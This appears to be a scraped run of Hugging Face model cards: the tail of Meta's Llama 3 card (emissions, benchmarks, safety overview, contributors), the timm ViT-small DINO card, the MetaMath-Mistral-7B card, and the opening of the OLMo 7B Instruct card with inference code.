**Training Factors** We used custom training libraries, Meta's Research SuperCluster, and production clusters for pretraining. Fine-tuning, annotation, and evaluation were also performed on third-party cloud compute.
**Carbon Footprint** Pretraining utilized a cumulative 7.7M GPU hours of computation on hardware of type H100-80GB (TDP of 700W). Estimated total emissions were 2290 tCO2eq, 100% of which were offset by Meta’s sustainability program.
<table>
<tr>
<td>
</td>
<td><strong>Time (GPU hours)</strong>
</td>
<td><strong>Power Consumption (W)</strong>
</td>
<td><strong>Carbon Emitted(tCO2eq)</strong>
</td>
</tr>
<tr>
<td>Llama 3 8B
</td>
<td>1.3M
</td>
<td>700
</td>
<td>390
</td>
</tr>
<tr>
<td>Llama 3 70B
</td>
<td>6.4M
</td>
<td>700
</td>
<td>1900
</td>
</tr>
<tr>
<td>Total
</td>
<td>7.7M
</td>
<td>
</td>
<td>2290
</td>
</tr>
</table>
**CO2 emissions during pre-training**. Time: total GPU time required for training each model. Power Consumption: peak power capacity per GPU device for the GPUs used adjusted for power usage efficiency. 100% of the emissions are directly offset by Meta's sustainability program, and because we are openly releasing these models, the pretraining costs do not need to be incurred by others.
## Training Data
**Overview** Llama 3 was pretrained on over 15 trillion tokens of data from publicly available sources. The fine-tuning data includes publicly available instruction datasets, as well as over 10M human-annotated examples. Neither the pretraining nor the fine-tuning datasets include Meta user data.
**Data Freshness** The pretraining data has a cutoff of March 2023 for the 8B and December 2023 for the 70B models respectively.
## Benchmarks
In this section, we report the results for Llama 3 models on standard automatic benchmarks. For all the evaluations, we use our internal evaluations library. For details on the methodology see [here](https://github.com/meta-llama/llama3/blob/main/eval_methodology.md).
### Base pretrained models
<table>
<tr>
<td><strong>Category</strong>
</td>
<td><strong>Benchmark</strong>
</td>
<td><strong>Llama 3 8B</strong>
</td>
<td><strong>Llama2 7B</strong>
</td>
<td><strong>Llama2 13B</strong>
</td>
<td><strong>Llama 3 70B</strong>
</td>
<td><strong>Llama2 70B</strong>
</td>
</tr>
<tr>
<td rowspan="6" >General
</td>
<td>MMLU (5-shot)
</td>
<td>66.6
</td>
<td>45.7
</td>
<td>53.8
</td>
<td>79.5
</td>
<td>69.7
</td>
</tr>
<tr>
<td>AGIEval English (3-5 shot)
</td>
<td>45.9
</td>
<td>28.8
</td>
<td>38.7
</td>
<td>63.0
</td>
<td>54.8
</td>
</tr>
<tr>
<td>CommonSenseQA (7-shot)
</td>
<td>72.6
</td>
<td>57.6
</td>
<td>67.6
</td>
<td>83.8
</td>
<td>78.7
</td>
</tr>
<tr>
<td>Winogrande (5-shot)
</td>
<td>76.1
</td>
<td>73.3
</td>
<td>75.4
</td>
<td>83.1
</td>
<td>81.8
</td>
</tr>
<tr>
<td>BIG-Bench Hard (3-shot, CoT)
</td>
<td>61.1
</td>
<td>38.1
</td>
<td>47.0
</td>
<td>81.3
</td>
<td>65.7
</td>
</tr>
<tr>
<td>ARC-Challenge (25-shot)
</td>
<td>78.6
</td>
<td>53.7
</td>
<td>67.6
</td>
<td>93.0
</td>
<td>85.3
</td>
</tr>
<tr>
<td>Knowledge reasoning
</td>
<td>TriviaQA-Wiki (5-shot)
</td>
<td>78.5
</td>
<td>72.1
</td>
<td>79.6
</td>
<td>89.7
</td>
<td>87.5
</td>
</tr>
<tr>
<td rowspan="4" >Reading comprehension
</td>
<td>SQuAD (1-shot)
</td>
<td>76.4
</td>
<td>72.2
</td>
<td>72.1
</td>
<td>85.6
</td>
<td>82.6
</td>
</tr>
<tr>
<td>QuAC (1-shot, F1)
</td>
<td>44.4
</td>
<td>39.6
</td>
<td>44.9
</td>
<td>51.1
</td>
<td>49.4
</td>
</tr>
<tr>
<td>BoolQ (0-shot)
</td>
<td>75.7
</td>
<td>65.5
</td>
<td>66.9
</td>
<td>79.0
</td>
<td>73.1
</td>
</tr>
<tr>
<td>DROP (3-shot, F1)
</td>
<td>58.4
</td>
<td>37.9
</td>
<td>49.8
</td>
<td>79.7
</td>
<td>70.2
</td>
</tr>
</table>
### Instruction tuned models
<table>
<tr>
<td><strong>Benchmark</strong>
</td>
<td><strong>Llama 3 8B</strong>
</td>
<td><strong>Llama 2 7B</strong>
</td>
<td><strong>Llama 2 13B</strong>
</td>
<td><strong>Llama 3 70B</strong>
</td>
<td><strong>Llama 2 70B</strong>
</td>
</tr>
<tr>
<td>MMLU (5-shot)
</td>
<td>68.4
</td>
<td>34.1
</td>
<td>47.8
</td>
<td>82.0
</td>
<td>52.9
</td>
</tr>
<tr>
<td>GPQA (0-shot)
</td>
<td>34.2
</td>
<td>21.7
</td>
<td>22.3
</td>
<td>39.5
</td>
<td>21.0
</td>
</tr>
<tr>
<td>HumanEval (0-shot)
</td>
<td>62.2
</td>
<td>7.9
</td>
<td>14.0
</td>
<td>81.7
</td>
<td>25.6
</td>
</tr>
<tr>
<td>GSM-8K (8-shot, CoT)
</td>
<td>79.6
</td>
<td>25.7
</td>
<td>77.4
</td>
<td>93.0
</td>
<td>57.5
</td>
</tr>
<tr>
<td>MATH (4-shot, CoT)
</td>
<td>30.0
</td>
<td>3.8
</td>
<td>6.7
</td>
<td>50.4
</td>
<td>11.6
</td>
</tr>
</table>
### Responsibility & Safety
We believe that an open approach to AI leads to better, safer products, faster innovation, and a bigger overall market. We are committed to Responsible AI development and took a series of steps to limit misuse and harm and support the open source community.
Foundation models are widely capable technologies that are built to be used for a diverse range of applications. They are not designed to meet every developer preference on safety levels for all use cases, out-of-the-box, as those by their nature will differ across different applications.
Rather, responsible LLM-application deployment is achieved by implementing a series of safety best practices throughout the development of such applications, from the model pre-training, fine-tuning and the deployment of systems composed of safeguards to tailor the safety needs specifically to the use case and audience.
As part of the Llama 3 release, we updated our [Responsible Use Guide](https://llama.meta.com/responsible-use-guide/) to outline the steps and best practices for developers to implement model and system level safety for their application. We also provide a set of resources including [Meta Llama Guard 2](https://llama.meta.com/purple-llama/) and [Code Shield](https://llama.meta.com/purple-llama/) safeguards. These tools have proven to drastically reduce residual risks of LLM Systems, while maintaining a high level of helpfulness. We encourage developers to tune and deploy these safeguards according to their needs and we provide a [reference implementation](https://github.com/meta-llama/llama-recipes/tree/main/recipes/responsible_ai) to get you started.
#### Llama 3-Instruct
As outlined in the Responsible Use Guide, some trade-off between model helpfulness and model alignment is likely unavoidable. Developers should exercise discretion about how to weigh the benefits of alignment and helpfulness for their specific use case and audience. Developers should be mindful of residual risks when using Llama models and leverage additional safety tools as needed to reach the right safety bar for their use case.
<span style="text-decoration:underline;">Safety</span>
For our instruction tuned model, we conducted extensive red teaming exercises, performed adversarial evaluations and implemented safety mitigation techniques to lower residual risks. As with any Large Language Model, residual risks will likely remain and we recommend that developers assess these risks in the context of their use case. In parallel, we are working with the community to make AI safety benchmark standards transparent, rigorous and interpretable.
<span style="text-decoration:underline;">Refusals</span>
In addition to residual risks, we put a great emphasis on model refusals to benign prompts. Over-refusing not only can impact the user experience but could even be harmful in certain contexts as well. We’ve heard the feedback from the developer community and improved our fine tuning to ensure that Llama 3 is significantly less likely to falsely refuse to answer prompts than Llama 2.
We built internal benchmarks and developed mitigations to limit false refusals, making Llama 3 our most helpful model to date.
#### Responsible release
In addition to responsible use considerations outlined above, we followed a rigorous process that requires us to take extra measures against misuse and critical risks before we make our release decision.
Misuse
If you access or use Llama 3, you agree to the Acceptable Use Policy. The most recent copy of this policy can be found at [https://llama.meta.com/llama3/use-policy/](https://llama.meta.com/llama3/use-policy/).
#### Critical risks
<span style="text-decoration:underline;">CBRNE</span> (Chemical, Biological, Radiological, Nuclear, and high yield Explosives)
We have conducted a two-fold assessment of the safety of the model in this area:
* Iterative testing during model training to assess the safety of responses related to CBRNE threats and other adversarial risks.
* Involving external CBRNE experts to conduct an uplift test assessing the ability of the model to accurately provide expert knowledge and reduce barriers to potential CBRNE misuse, by reference to what can be achieved using web search (without the model).
### <span style="text-decoration:underline;">Cyber Security </span>
We have evaluated Llama 3 with CyberSecEval, Meta’s cybersecurity safety eval suite, measuring Llama 3’s propensity to suggest insecure code when used as a coding assistant, and Llama 3’s propensity to comply with requests to help carry out cyber attacks, where attacks are defined by the industry standard MITRE ATT&CK cyber attack ontology. On our insecure coding and cyber attacker helpfulness tests, Llama 3 behaved in the same range or safer than models of [equivalent coding capability](https://huggingface.co/spaces/facebook/CyberSecEval).
### <span style="text-decoration:underline;">Child Safety</span>
Child Safety risk assessments were conducted using a team of experts, to assess the model’s capability to produce outputs that could result in Child Safety risks and inform on any necessary and appropriate risk mitigations via fine tuning. We leveraged those expert red teaming sessions to expand the coverage of our evaluation benchmarks through Llama 3 model development. For Llama 3, we conducted new in-depth sessions using objective based methodologies to assess the model risks along multiple attack vectors. We also partnered with content specialists to perform red teaming exercises assessing potentially violating content while taking account of market specific nuances or experiences.
### Community
Generative AI safety requires expertise and tooling, and we believe in the strength of the open community to accelerate its progress. We are active members of open consortiums, including the AI Alliance, Partnership on AI and MLCommons, actively contributing to safety standardization and transparency. We encourage the community to adopt taxonomies like the MLCommons Proof of Concept evaluation to facilitate collaboration and transparency on safety and content evaluations. Our Purple Llama tools are open sourced for the community to use and widely distributed across ecosystem partners including cloud service providers. We encourage community contributions to our [Github repository](https://github.com/meta-llama/PurpleLlama).
Finally, we put in place a set of resources including an [output reporting mechanism](https://developers.facebook.com/llama_output_feedback) and [bug bounty program](https://www.facebook.com/whitehat) to continuously improve the Llama technology with the help of the community.
## Ethical Considerations and Limitations
The core values of Llama 3 are openness, inclusivity and helpfulness. It is meant to serve everyone, and to work for a wide range of use cases. It is thus designed to be accessible to people across many different backgrounds, experiences and perspectives. Llama 3 addresses users and their needs as they are, without inserting unnecessary judgment or normativity, while reflecting the understanding that even content that may appear problematic in some cases can serve valuable purposes in others. It respects the dignity and autonomy of all users, especially in terms of the values of free thought and expression that power innovation and progress.
But Llama 3 is a new technology, and like any new technology, there are risks associated with its use. Testing conducted to date has been in English, and has not covered, nor could it cover, all scenarios. For these reasons, as with all LLMs, Llama 3’s potential outputs cannot be predicted in advance, and the model may in some instances produce inaccurate, biased or other objectionable responses to user prompts. Therefore, before deploying any applications of Llama 3 models, developers should perform safety testing and tuning tailored to their specific applications of the model. As outlined in the Responsible Use Guide, we recommend incorporating [Purple Llama](https://github.com/facebookresearch/PurpleLlama) solutions into your workflows and specifically [Llama Guard](https://ai.meta.com/research/publications/llama-guard-llm-based-input-output-safeguard-for-human-ai-conversations/) which provides a base model to filter input and output prompts to layer system-level safety on top of model-level safety.
Please see the Responsible Use Guide available at [http://llama.meta.com/responsible-use-guide](http://llama.meta.com/responsible-use-guide)
## Citation instructions
@article{llama3modelcard,
title={Llama 3 Model Card},
author={AI@Meta},
year={2024},
url = {https://github.com/meta-llama/llama3/blob/main/MODEL_CARD.md}
}
## Contributors
Aaditya Singh; Aaron Grattafiori; Abhimanyu Dubey; Abhinav Jauhri; Abhinav Pandey; Abhishek Kadian; Adam Kelsey; Adi Gangidi; Ahmad Al-Dahle; Ahuva Goldstand; Aiesha Letman; Ajay Menon; Akhil Mathur; Alan Schelten; Alex Vaughan; Amy Yang; Andrei Lupu; Andres Alvarado; Andrew Gallagher; Andrew Gu; Andrew Ho; Andrew Poulton; Andrew Ryan; Angela Fan; Ankit Ramchandani; Anthony Hartshorn; Archi Mitra; Archie Sravankumar; Artem Korenev; Arun Rao; Ashley Gabriel; Ashwin Bharambe; Assaf Eisenman; Aston Zhang; Aurelien Rodriguez; Austen Gregerson; Ava Spataru; Baptiste Roziere; Ben Maurer; Benjamin Leonhardi; Bernie Huang; Bhargavi Paranjape; Bing Liu; Binh Tang; Bobbie Chern; Brani Stojkovic; Brian Fuller; Catalina Mejia Arenas; Chao Zhou; Charlotte Caucheteux; Chaya Nayak; Ching-Hsiang Chu; Chloe Bi; Chris Cai; Chris Cox; Chris Marra; Chris McConnell; Christian Keller; Christoph Feichtenhofer; Christophe Touret; Chunyang Wu; Corinne Wong; Cristian Canton Ferrer; Damien Allonsius; Daniel Kreymer; Daniel Haziza; Daniel Li; Danielle Pintz; Danny Livshits; Danny Wyatt; David Adkins; David Esiobu; David Xu; Davide Testuggine; Delia David; Devi Parikh; Dhruv Choudhary; Dhruv Mahajan; Diana Liskovich; Diego Garcia-Olano; Diego Perino; Dieuwke Hupkes; Dingkang Wang; Dustin Holland; Egor Lakomkin; Elina Lobanova; Xiaoqing Ellen Tan; Emily Dinan; Eric Smith; Erik Brinkman; Esteban Arcaute; Filip Radenovic; Firat Ozgenel; Francesco Caggioni; Frank Seide; Frank Zhang; Gabriel Synnaeve; Gabriella Schwarz; Gabrielle Lee; Gada Badeer; Georgia Anderson; Graeme Nail; Gregoire Mialon; Guan Pang; Guillem Cucurell; Hailey Nguyen; Hannah Korevaar; Hannah Wang; Haroun Habeeb; Harrison Rudolph; Henry Aspegren; Hu Xu; Hugo Touvron; Iga Kozlowska; Igor Molybog; Igor Tufanov; Iliyan Zarov; Imanol Arrieta Ibarra; Irina-Elena Veliche; Isabel Kloumann; Ishan Misra; Ivan Evtimov; Jacob Xu; Jade Copet; Jake Weissman; Jan Geffert; Jana Vranes; Japhet Asher; Jason Park; Jay Mahadeokar; Jean-Baptiste Gaya; Jeet Shah; Jelmer van der Linde; Jennifer Chan; Jenny Hong; Jenya Lee; Jeremy Fu; Jeremy Teboul; Jianfeng Chi; Jianyu Huang; Jie Wang; Jiecao Yu; Joanna Bitton; Joe Spisak; Joelle Pineau; Jon Carvill; Jongsoo Park; Joseph Rocca; Joshua Johnstun; Junteng Jia; Kalyan Vasuden Alwala; Kam Hou U; Kate Plawiak; Kartikeya Upasani; Kaushik Veeraraghavan; Ke Li; Kenneth Heafield; Kevin Stone; Khalid El-Arini; Krithika Iyer; Kshitiz Malik; Kuenley Chiu; Kunal Bhalla; Kyle Huang; Lakshya Garg; Lauren Rantala-Yeary; Laurens van der Maaten; Lawrence Chen; Leandro Silva; Lee Bell; Lei Zhang; Liang Tan; Louis Martin; Lovish Madaan; Luca Wehrstedt; Lukas Blecher; Luke de Oliveira; Madeline Muzzi; Madian Khabsa; Manav Avlani; Mannat Singh; Manohar Paluri; Mark Zuckerberg; Marcin Kardas; Martynas Mankus; Mathew Oldham; Mathieu Rita; Matthew Lennie; Maya Pavlova; Meghan Keneally; Melanie Kambadur; Mihir Patel; Mikayel Samvelyan; Mike Clark; Mike Lewis; Min Si; Mitesh Kumar Singh; Mo Metanat; Mona Hassan; Naman Goyal; Narjes Torabi; Nicolas Usunier; Nikolay Bashlykov; Nikolay Bogoychev; Niladri Chatterji; Ning Dong; Oliver Aobo Yang; Olivier Duchenne; Onur Celebi; Parth Parekh; Patrick Alrassy; Paul Saab; Pavan Balaji; Pedro Rittner; Pengchuan Zhang; Pengwei Li; Petar Vasic; Peter Weng; Polina Zvyagina; Prajjwal Bhargava; Pratik Dubal; Praveen Krishnan; Punit Singh Koura; Qing He; Rachel Rodriguez; Ragavan Srinivasan; Rahul Mitra; Ramon Calderer; Raymond Li; Robert Stojnic; Roberta Raileanu; Robin Battey; Rocky Wang; Rohit Girdhar; Rohit Patel; 
Romain Sauvestre; Ronnie Polidoro; Roshan Sumbaly; Ross Taylor; Ruan Silva; Rui Hou; Rui Wang; Russ Howes; Ruty Rinott; Saghar Hosseini; Sai Jayesh Bondu; Samyak Datta; Sanjay Singh; Sara Chugh; Sargun Dhillon; Satadru Pan; Sean Bell; Sergey Edunov; Shaoliang Nie; Sharan Narang; Sharath Raparthy; Shaun Lindsay; Sheng Feng; Sheng Shen; Shenghao Lin; Shiva Shankar; Shruti Bhosale; Shun Zhang; Simon Vandenhende; Sinong Wang; Seohyun Sonia Kim; Soumya Batra; Sten Sootla; Steve Kehoe; Suchin Gururangan; Sumit Gupta; Sunny Virk; Sydney Borodinsky; Tamar Glaser; Tamar Herman; Tamara Best; Tara Fowler; Thomas Georgiou; Thomas Scialom; Tianhe Li; Todor Mihaylov; Tong Xiao; Ujjwal Karn; Vedanuj Goswami; Vibhor Gupta; Vignesh Ramanathan; Viktor Kerkez; Vinay Satish Kumar; Vincent Gonguet; Vish Vogeti; Vlad Poenaru; Vlad Tiberiu Mihailescu; Vladan Petrovic; Vladimir Ivanov; Wei Li; Weiwei Chu; Wenhan Xiong; Wenyin Fu; Wes Bouaziz; Whitney Meers; Will Constable; Xavier Martinet; Xiaojian Wu; Xinbo Gao; Xinfeng Xie; Xuchao Jia; Yaelle Goldschlag; Yann LeCun; Yashesh Gaur; Yasmine Babaei; Ye Qi; Yenda Li; Yi Wen; Yiwen Song; Youngjin Nam; Yuchen Hao; Yuchen Zhang; Yun Wang; Yuning Mao; Yuzi He; Zacharie Delpierre Coudert; Zachary DeVito; Zahra Hankir; Zhaoduo Wen; Zheng Yan; Zhengxing Chen; Zhenyu Yang; Zoe Papakipos
|
timm/vit_small_patch8_224.dino | timm | "2024-02-09T18:10:48Z" | 3,638 | 1 | timm | [
"timm",
"pytorch",
"safetensors",
"image-feature-extraction",
"arxiv:2104.14294",
"arxiv:2010.11929",
"license:apache-2.0",
"region:us"
] | image-feature-extraction | "2022-12-22T07:52:53Z" | ---
license: apache-2.0
library_name: timm
tags:
- image-feature-extraction
- timm
---
# Model card for vit_small_patch8_224.dino
A Vision Transformer (ViT) image feature model. Trained with Self-Supervised DINO method.
## Model Details
- **Model Type:** Image classification / feature backbone
- **Model Stats:**
- Params (M): 21.7
- GMACs: 16.8
- Activations (M): 32.9
- Image size: 224 x 224
- **Papers:**
- Emerging Properties in Self-Supervised Vision Transformers: https://arxiv.org/abs/2104.14294
- An Image is Worth 16x16 Words: Transformers for Image Recognition at Scale: https://arxiv.org/abs/2010.11929v2
- **Pretrain Dataset:** ImageNet-1k
- **Original:** https://github.com/facebookresearch/dino
## Model Usage
### Image Classification
```python
from urllib.request import urlopen
from PIL import Image
import timm
import torch  # needed for torch.topk below
img = Image.open(urlopen(
'https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/beignets-task-guide.png'
))
model = timm.create_model('vit_small_patch8_224.dino', pretrained=True)
model = model.eval()
# get model specific transforms (normalization, resize)
data_config = timm.data.resolve_model_data_config(model)
transforms = timm.data.create_transform(**data_config, is_training=False)
output = model(transforms(img).unsqueeze(0)) # unsqueeze single image into batch of 1
top5_probabilities, top5_class_indices = torch.topk(output.softmax(dim=1) * 100, k=5)
```
### Image Embeddings
```python
from urllib.request import urlopen
from PIL import Image
import timm
img = Image.open(urlopen(
'https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/beignets-task-guide.png'
))
model = timm.create_model(
'vit_small_patch8_224.dino',
pretrained=True,
num_classes=0, # remove classifier nn.Linear
)
model = model.eval()
# get model specific transforms (normalization, resize)
data_config = timm.data.resolve_model_data_config(model)
transforms = timm.data.create_transform(**data_config, is_training=False)
output = model(transforms(img).unsqueeze(0)) # output is (batch_size, num_features) shaped tensor
# or equivalently (without needing to set num_classes=0)
output = model.forward_features(transforms(img).unsqueeze(0))
# output is unpooled, a (1, 785, 384) shaped tensor
output = model.forward_head(output, pre_logits=True)
# output is a (1, num_features) shaped tensor
```
## Model Comparison
Explore the dataset and runtime metrics of this model in timm [model results](https://github.com/huggingface/pytorch-image-models/tree/main/results).
## Citation
```bibtex
@inproceedings{caron2021emerging,
title={Emerging properties in self-supervised vision transformers},
  author={Caron, Mathilde and Touvron, Hugo and Misra, Ishan and J{\'e}gou, Herv{\'e} and Mairal, Julien and Bojanowski, Piotr and Joulin, Armand},
booktitle={Proceedings of the IEEE/CVF international conference on computer vision},
pages={9650--9660},
year={2021}
}
```
```bibtex
@article{dosovitskiy2020vit,
title={An Image is Worth 16x16 Words: Transformers for Image Recognition at Scale},
author={Dosovitskiy, Alexey and Beyer, Lucas and Kolesnikov, Alexander and Weissenborn, Dirk and Zhai, Xiaohua and Unterthiner, Thomas and Dehghani, Mostafa and Minderer, Matthias and Heigold, Georg and Gelly, Sylvain and Uszkoreit, Jakob and Houlsby, Neil},
journal={ICLR},
year={2021}
}
```
```bibtex
@misc{rw2019timm,
author = {Ross Wightman},
title = {PyTorch Image Models},
year = {2019},
publisher = {GitHub},
journal = {GitHub repository},
doi = {10.5281/zenodo.4414861},
howpublished = {\url{https://github.com/huggingface/pytorch-image-models}}
}
```
|
meta-math/MetaMath-Mistral-7B | meta-math | "2023-12-21T01:39:02Z" | 3,638 | 89 | transformers | [
"transformers",
"pytorch",
"mistral",
"text-generation",
"dataset:meta-math/MetaMathQA",
"arxiv:2309.12284",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-10-22T11:12:15Z" | ---
license: apache-2.0
datasets:
- meta-math/MetaMathQA
---
see our paper in https://arxiv.org/abs/2309.12284
View the project page:
https://meta-math.github.io/
## Note
All MetaMathQA data are augmented from the training sets of GSM8K and MATH.
<span style="color:red"><b>None of the augmented data is from the testing set.</b></span>
You can check the `original_question` in `meta-math/MetaMathQA`, each item is from the GSM8K or MATH train set.
## Model Details
MetaMath-Mistral-7B is fully fine-tuned on the MetaMathQA datasets and based on the powerful Mistral-7B model. We are glad to see that using the MetaMathQA dataset and changing the base model from LLaMA-2-7B to Mistral-7B boosts the GSM8K performance from 66.5 to **77.7**.
To fine-tune Mistral-7B, I would suggest using a smaller learning rate (usually 1/5 to 1/10 of the lr for LLaMA-2-7B) and keeping the other training args unchanged.
More training details and scripts can be seen at https://github.com/meta-math/MetaMath
## Installation
```
pip install transformers==4.35.0
pip install torch==2.0.1
pip install sentencepiece==0.1.99
pip install tokenizers==0.13.3
pip install accelerate==0.21.0
pip install bitsandbytes==0.40.0
pip install vllm
pip install fraction
pip install protobuf
```
## Model Usage
prompting template:
```
"Below is an instruction that describes a task. "
"Write a response that appropriately completes the request.\n\n"
"### Instruction:\n{instruction}\n\n### Response: Let's think step by step."
```
where you replace `{instruction}` with your query question; a minimal example of filling and running the template is sketched below.
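A minimal sketch of filling the template and generating with plain `transformers` is shown here; the generation settings (greedy decoding, 512 new tokens) and the use of `device_map="auto"` (which requires `accelerate`) are assumptions, not part of the original recipe.
```python
from transformers import AutoModelForCausalLM, AutoTokenizer

PROMPT = (
    "Below is an instruction that describes a task. "
    "Write a response that appropriately completes the request.\n\n"
    "### Instruction:\n{instruction}\n\n### Response: Let's think step by step."
)

model_id = "meta-math/MetaMath-Mistral-7B"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id, device_map="auto")

# Fill the template with your math question.
prompt = PROMPT.format(instruction="James buys 5 packs of beef that are 4 pounds each. How many pounds of beef did he buy?")
inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
outputs = model.generate(**inputs, max_new_tokens=512)
print(tokenizer.decode(outputs[0][inputs.input_ids.shape[-1]:], skip_special_tokens=True))
```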
There is another interesting repo about Arithmo-Mistral-7B at https://huggingface.co/akjindal53244/Arithmo-Mistral-7B, where they combine our MetaMathQA dataset and the MathInstruct dataset to train a powerful model. Thanks again for their contributions.
We will also try training on the combination of the **MetaMathQA** and **MathInstruct** datasets, and will release all the results and training details.
## Experiments
| Model | GSM8k Pass@1 | MATH Pass@1 |
|---------------------|--------------|-------------|
| MPT-7B | 6.8 | 3.0 |
| Falcon-7B | 6.8 | 2.3 |
| LLaMA-1-7B | 11.0 | 2.9 |
| LLaMA-2-7B | 14.6 | 2.5 |
| MPT-30B | 15.2 | 3.1 |
| LLaMA-1-13B | 17.8 | 3.9 |
| GPT-Neo-2.7B | 19.5 | -- |
| Falcon-40B | 19.6 | 2.5 |
| Baichuan-chat-13B | 23.9 | -- |
| Vicuna-v1.3-13B | 27.6 | -- |
| LLaMA-2-13B | 28.7 | 3.9 |
| InternLM-7B | 31.2 | -- |
| ChatGLM-2-6B | 32.4 | -- |
| GPT-J-6B | 34.9 | -- |
| LLaMA-1-33B | 35.6 | 3.9 |
| LLaMA-2-34B | 42.2 | 6.24 |
| RFT-7B | 50.3 | -- |
| LLaMA-1-65B | 50.9 | 10.6 |
| Qwen-7B | 51.6 | -- |
| WizardMath-7B | 54.9 | 10.7 |
| LLaMA-2-70B | 56.8 | 13.5 |
| WizardMath-13B | 63.9 | 14.0 |
| MAmmoTH-7B (COT) | 50.5 | 10.4 |
| MAmmoTH-7B (POT+COT)| 53.6 | 31.5 |
| Arithmo-Mistral-7B | 74.7 | 25.3 |
| MetaMath-7B | 66.5 | 19.8 |
| MetaMath-13B | 72.3 | 22.4 |
| 🔥 **MetaMath-Mistral-7B** | **77.7** | **28.2** |
## Citation
```bibtex
@article{yu2023metamath,
title={MetaMath: Bootstrap Your Own Mathematical Questions for Large Language Models},
author={Yu, Longhui and Jiang, Weisen and Shi, Han and Yu, Jincheng and Liu, Zhengying and Zhang, Yu and Kwok, James T and Li, Zhenguo and Weller, Adrian and Liu, Weiyang},
journal={arXiv preprint arXiv:2309.12284},
year={2023}
}
```
```bibtex
@article{jiang2023mistral,
title={Mistral 7B},
author={Jiang, Albert Q and Sablayrolles, Alexandre and Mensch, Arthur and Bamford, Chris and Chaplot, Devendra Singh and Casas, Diego de las and Bressand, Florian and Lengyel, Gianna and Lample, Guillaume and Saulnier, Lucile and others},
journal={arXiv preprint arXiv:2310.06825},
year={2023}
}
``` |
allenai/OLMo-7B-Instruct-hf | allenai | "2024-06-04T20:43:45Z" | 3,636 | 0 | transformers | [
"transformers",
"pytorch",
"olmo",
"text-generation",
"conversational",
"en",
"dataset:allenai/dolma",
"dataset:allenai/tulu-v2-sft-mixture",
"dataset:allenai/ultrafeedback_binarized_cleaned",
"arxiv:2402.00838",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | "2024-06-04T19:54:24Z" | ---
license: apache-2.0
datasets:
- allenai/dolma
- allenai/tulu-v2-sft-mixture
- allenai/ultrafeedback_binarized_cleaned
language:
- en
---
<img src="https://allenai.org/olmo/olmo-7b-animation.gif" alt="OLMo Logo" width="800" style="margin-left:'auto' margin-right:'auto' display:'block'"/>
# Model Card for OLMo 7B Instruct
<!-- Provide a quick summary of what the model is/does. -->
OLMo is a series of **O**pen **L**anguage **Mo**dels designed to enable the science of language models.
The OLMo base models are trained on the [Dolma](https://huggingface.co/datasets/allenai/dolma) dataset.
The adapted versions are trained on the [Tulu SFT mixture](https://huggingface.co/datasets/allenai/tulu-v2-sft-mixture) and, for the Instruct version, a [cleaned version of the UltraFeedback dataset](https://huggingface.co/datasets/allenai/ultrafeedback_binarized_cleaned).
We release all code, checkpoints, logs, and details involved in training these models.
OLMo 7B Instruct and OLMo SFT are two adapted versions of these models trained for better question answering.
They show the performance gain that OLMo base models can achieve with existing fine-tuning techniques.
**This version is for direct use with HuggingFace Transformers** from v4.40 on.
## Model Details
We release two adapted model versions:
| Model | Training Method(s) | Datasets | Context Length |
|------|--------|---------|--|
| [OLMo 7B SFT](https://huggingface.co/allenai/OLMo-7B-SFT) | SFT | [Tulu 2 SFT Mix](https://huggingface.co/datasets/allenai/tulu-v2-sft-mixture) | 2048 |
| [OLMo 7B Instruct](https://huggingface.co/allenai/OLMo-7B-Instruct) | SFT + DPO | [Tulu 2 SFT Mix](https://huggingface.co/datasets/allenai/tulu-v2-sft-mixture) + [Ultrafeedback Cleaned](https://huggingface.co/datasets/allenai/ultrafeedback_binarized_cleaned) | 2048 |
The base models related to this adapted model are the following:
| Size | Training Tokens | Layers | Hidden Size | Attention Heads | Context Length |
|------|--------|---------|-------------|-----------------|----------------|
| [OLMo 1B](https://huggingface.co/allenai/OLMo-1B) | 3 Trillion |16 | 2048 | 16 | 2048 |
| [OLMo 7B](https://huggingface.co/allenai/OLMo-7B) | 2.5 Trillion | 32 | 4096 | 32 | 2048 |
| [OLMo 7B Twin 2T](https://huggingface.co/allenai/OLMo-7B-Twin-2T) | 2 Trillion | 32 | 4096 | 32 | 2048 |
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** Allen Institute for AI (AI2)
- **Supported by:** Databricks, Kempner Institute for the Study of Natural and Artificial Intelligence at Harvard University, AMD, CSC (Lumi Supercomputer), UW
- **Model type:** a Transformer style autoregressive language model.
- **Language(s) (NLP):** English
- **License:** The code and model are released under Apache 2.0.
- **Contact:** Technical inquiries: `olmo at allenai dot org`. Press: `press at allenai dot org`
- **Date cutoff:** Feb./March 2023 based on Dolma dataset version.
### Model Sources
<!-- Provide the basic links for the model. -->
- **Project Page:** https://allenai.org/olmo
- **Repositories:**
- Core repo (training, inference, fine-tuning etc.): https://github.com/allenai/OLMo
- Evaluation code: https://github.com/allenai/OLMo-Eval
- Further fine-tuning code: https://github.com/allenai/open-instruct
- **Paper:** [Link](https://arxiv.org/abs/2402.00838)
- **Technical blog post:** https://blog.allenai.org/olmo-open-language-model-87ccfc95f580
- **W&B Logs:** https://wandb.ai/ai2-llm/OLMo-7B/reports/OLMo-7B--Vmlldzo2NzQyMzk5
<!-- - **Press release:** TODO -->
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Inference
You can load and run this model as usual so long as your HuggingFace version is >= 4.40:
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
olmo = AutoModelForCausalLM.from_pretrained("allenai/OLMo-7B-Instruct-hf")
tokenizer = AutoTokenizer.from_pretrained("allenai/OLMo-7B-Instruct-hf")
messages = [{"role": "user", "content": "What is 2+2?"}]
inputs = tokenizer.apply_chat_template(messages, tokenize=True, add_generation_prompt=True, return_tensors="pt", return_dict=True)  # return_dict=True so **inputs works below
# optional verifying cuda
# inputs = {k: v.to('cuda') for k,v in inputs.items()}
# olmo = olmo.to('cuda')
response = olmo.generate(**inputs, max_new_tokens=100, do_sample=True, top_k=50, top_p=0.95)
print(tokenizer.batch_decode(response, skip_special_tokens=True)[0])
>> '2+2=4'
```
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
Core model results for the 7B adapted models are found below.
